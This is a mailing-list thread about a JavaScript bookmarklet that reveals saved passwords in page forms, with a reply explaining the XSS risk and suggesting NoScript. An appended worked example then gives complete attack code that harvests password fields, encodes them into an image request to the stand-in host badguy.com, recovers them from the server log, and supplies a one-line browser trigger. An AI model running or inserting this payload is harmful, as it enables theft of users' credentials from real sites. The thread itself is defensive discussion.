Re: Protection against showing hidden passwords with javascript



matthewslaney@xxxxxxxxx writes:

Hi,

I recently learned of the "exploit" where you can run a javascript
command to view saved passwords that are hidden. This code:

javascript:(function(){
  var s, F, j, f, i;
  s = "";
  F = document.forms;                  /* every form on the current page */
  for (j = 0; j < F.length; ++j) {     /* walk each form ... */
    f = F[j];
    for (i = 0; i < f.length; ++i) {   /* ... and each control inside it */
      if (f[i].type.toLowerCase() == "password")
        s += f[i].value + "\n";        /* the value the browser auto-filled */
    }
  }
  if (s) alert("Passwords in forms on this page:\n\n" + s);
  else alert("There are no passwords in forms on this page.");
})();

I was wondering if there was any way to protect against this?

Please refrain from stating the obvious, "don't save your passwords".
There are a couple of sites I use frequently and don't care about
security too much, but don't want my passwords to disappear.


This code is a good example of why cross-site scripting (XSS)
vulnerabilities are a big deal, and why you don't want untrusted third
party javascript running in the security context of another domain's
page. That code can be trivially modified to load a blank image
from an attacker's site with arguments attached that send those
passwords to that site's log file (e.g. loading
badguy.com/blank.jpg?password1=blah&password2=foo)

To protect against this on the client end, turning off javascript
(made more manageable by the Firefox NoScript plugin as suggested by
another user) is probably the most realistic countermeasure.

There are other risks associated with auto populating passwords in
pages, and like any other security issue, you have to make the balance
of convenience and security that's right for you.

Best Regards,
--
Todd H.
http://www.toddh.net/
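The modification Todd describes, worked through as an added example (this is not code from the original post or from either poster): the same harvesting loop as the bookmarklet, followed by the step that turns it into an exfiltration, namely packing the values into query parameters on an image request, and the step an attacker would then take on the other side, pulling the values back out of the resulting web-server log line. badguy.com and blank.jpg are the hypothetical attacker host and path from the reply; the forms collection and the log line are constructed here so the whole thing runs under Node without a DOM. One deliberate difference from the bookmarklet: password fields the browser left empty are skipped, since they carry nothing worth sending.

```javascript
// Collect the value of every non-empty password field in a forms collection.
// In a browser pass document.forms; here any array-like of array-likes works.
function harvestPasswords(forms) {
  const found = [];
  for (let j = 0; j < forms.length; ++j) {
    const f = forms[j];
    for (let i = 0; i < f.length; ++i) {
      const el = f[i];
      if (el.type && el.type.toLowerCase() === "password" && el.value) {
        found.push(el.value);
      }
    }
  }
  return found;
}

// Build the exfiltration URL the reply describes: each harvested value becomes
// a query parameter on an otherwise harmless image request. URLSearchParams
// percent-encodes characters such as '&' so one password cannot be confused
// with the next. badguy.com is the hypothetical attacker host from the reply.
function buildExfilUrl(passwords, host = "badguy.com") {
  const url = new URL(`https://${host}/blank.jpg`);
  passwords.forEach((p, idx) => url.searchParams.set(`password${idx + 1}`, p));
  return url.toString();
}

// What the attacker reads back out of the access log: given one request line
// of the form "GET /blank.jpg?password1=... HTTP/1.1", recover the values.
function parseExfilLog(requestLine) {
  const path = requestLine.split(" ")[1];
  const params = new URL(path, "https://placeholder.invalid").searchParams;
  const out = [];
  for (const [k, v] of params) {
    if (/^password\d+$/.test(k)) out.push(v);
  }
  return out;
}

// Constructed stand-in for document.forms: a login form the browser has
// auto-filled, and a second form whose password field was left empty.
const fakeForms = [
  [
    { type: "text", value: "alice" },
    { type: "PASSWORD", value: "hunter2&more" },  // mixed case, as in the wild
  ],
  [
    { type: "hidden", value: "csrf-token" },
    { type: "password", value: "" },              // nothing auto-filled here
  ],
];

const leaked = harvestPasswords(fakeForms);
const exfilUrl = buildExfilUrl(leaked);
console.log("harvested:", leaked);
console.log("exfil URL:", exfilUrl);

// Constructed access-log request line, as the attacker's server would record
// it once the image request arrived.
const parsed = new URL(exfilUrl);
const logLine = `GET ${parsed.pathname}${parsed.search} HTTP/1.1`;
console.log("recovered from log:", parseExfilLog(logLine));
```

In a browser the only extra step is `new Image().src = buildExfilUrl(harvestPasswords(document.forms));`. The attacker uses an image rather than an XMLHttpRequest because the same-origin policy does not stop the browser from fetching an image from another domain, so no response needs to be readable: the query string in the request is the leak, and the server never has to return a real picture.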